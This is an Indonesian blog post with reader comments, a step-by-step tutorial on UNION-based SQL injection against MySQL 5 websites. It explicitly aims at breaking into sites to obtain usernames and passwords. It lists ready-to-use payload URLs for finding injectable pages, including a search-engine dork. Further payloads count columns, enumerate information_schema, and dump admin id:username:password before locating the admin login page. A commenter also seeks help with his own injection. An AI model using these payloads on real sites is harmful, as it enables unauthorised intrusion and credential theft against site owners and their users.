Search Engine Submission - AddMe rtikel dan File Sharing: Tips|| Belajar SQL Injection v.5 rtikel dan File Sharing: Tips|| Belajar SQL Injection v.5 DYTOSHARE

Online CPM Advertising | Advertising blog

Tips|| Belajar SQL Injection v.5

Pernah terfikir oleh kalian untuk bisa membobol suatu situs yang mengandung database username dan pasword?? Hal ini bisa kalian lakukan dengan belajar suatu metode scrip tertentu yang bisannya terkenal dengan nama SQL Injection. SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.

Hal pertama yang harus kamu lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ' setelah url atau -
Contoh : http://www.news.com/berita.php?id=112'  atau http://www.news.com/berita.php?id=-112

Penambahan karakter tersebut akan menyebabkan eror dalam site tersebut. Hal seperti ini yang dapat kita lanjutkan untuk mencari tahu database. Namun apa bila setelah diberi tambahan karakter tidak terjadi apa-apa anda tidak dapat melanjutkan ke step berikutnya.

berikut ini saya berikan petuntuk serta video tutorial selanjutnya untuk menbobol database : (cara ini hanya dapat anda lakukan pada situs yang menggunakan sql v.5

===========================================================
Yang perlu di ketahui sebelum sql injection pada mysql:

karakter: ',-
comments: /*,--
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
allinurl:news.php?newsid=

============
=step Satu:=
============


carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
        [site]/berita.php?id=-100


===========
=step Dua:=
===========


mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
        [site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step...
misal: [site]/berita.php?id=-100+order+by+1--
       [site]/berita.php?id=-100+order+by+2--
       [site]/berita.php?id=-100+order+by+3--
       [site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--



============
=step Tiga:=
============

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
       [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


=============
=step Empat:=
=============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name                 >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/*    >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


============
=step Lima:=
============

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name)                     >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()    >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name) ,6,7,8+from+information_schema.tables+where+table_schema=database()--



==============
= step Enam: =
==============

perintah group_concat(column_name)                               >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa--    >>> dimasukan setelah angka terakhir


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm
                     http://www.industrialtrainer.com/Unicode.shtm
                     http://www.dolcevie.com/js/converter.html
                     http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


=============
=step Tujuh:=
=============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan)        >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal)                                              >>> dimasukan setelah angka terakhir


[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--



contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



===============
=step Delapan:=
===============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda...
Video tutorial :


download full tutorial click here
Posted on 10.21 by Admin-fadewae and filed under , , , , , , | 9 Comments »

9 komentar:

Anonim mengatakan... @ 14 Juli 2010 05.01

izin download video sob....

Admin-fadewae mengatakan... @ 14 Juli 2010 19.05

semoga bermanfaat.... tapi ingat, belajar Hack bukan untuk menjadi hacker.

Anonim mengatakan... @ 18 Juli 2010 20.39

siip....

Admin-fadewae mengatakan... @ 19 Juli 2010 20.23

sama-sama..

Anonim mengatakan... @ 23 Juli 2010 21.31

pusing lhtnya

ada modulnya ato tutorialnya yg basic + penjelasnnya gag bro...???

coz di skolahan ada pelajanran web design dan web database...

:a:

Admin-fadewae mengatakan... @ 23 Juli 2010 21.37

Anonim: kan ada tu tutorial video ma tulisannya di bawah video juga ada file yang bisa di download biar lebih jelas...

Anonim mengatakan... @ 23 Juli 2010 21.39

oh ya
1 lagi

request modul buad web design n pembuatan web database dong bro....

Admin-fadewae mengatakan... @ 23 Juli 2010 21.43

nanti saya usahakan untuk membuat artikel tentang web design...

terima kasih untuk requesnya..

8L4CK_D09 mengatakan... @ 1 Oktober 2010 04.07

saya nemuin kasus baru;

.../news.php?id=8+union+all+select+1,2,(acid),4,5,6,7,8+from+article_cats--

Nah, keluar lagi tabel baru:
8
1 <- ini yg gede
5

berarti total ada 3 tabel sama "1"
Cara masuk ke tabel "1" (tabel ke-3) gimana???

Posting Komentar

Bola Lover
  • Digg
  • del.icio.us
  • Facebook
  • Google
  • StumbleUpon
  • Technorati
  • TwitThis
Read more: http://www.fadewae.blogspot.com